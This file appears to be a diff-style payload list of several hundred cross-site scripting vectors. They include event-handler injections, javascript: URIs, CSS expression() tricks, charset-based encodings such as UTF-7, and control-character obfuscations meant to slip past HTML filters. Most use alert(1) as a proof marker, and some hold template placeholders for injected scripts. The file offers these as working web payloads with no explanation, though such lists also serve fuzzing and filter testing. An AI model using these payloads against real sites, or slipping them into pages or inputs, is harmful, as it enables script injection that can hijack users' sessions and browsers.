+<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> 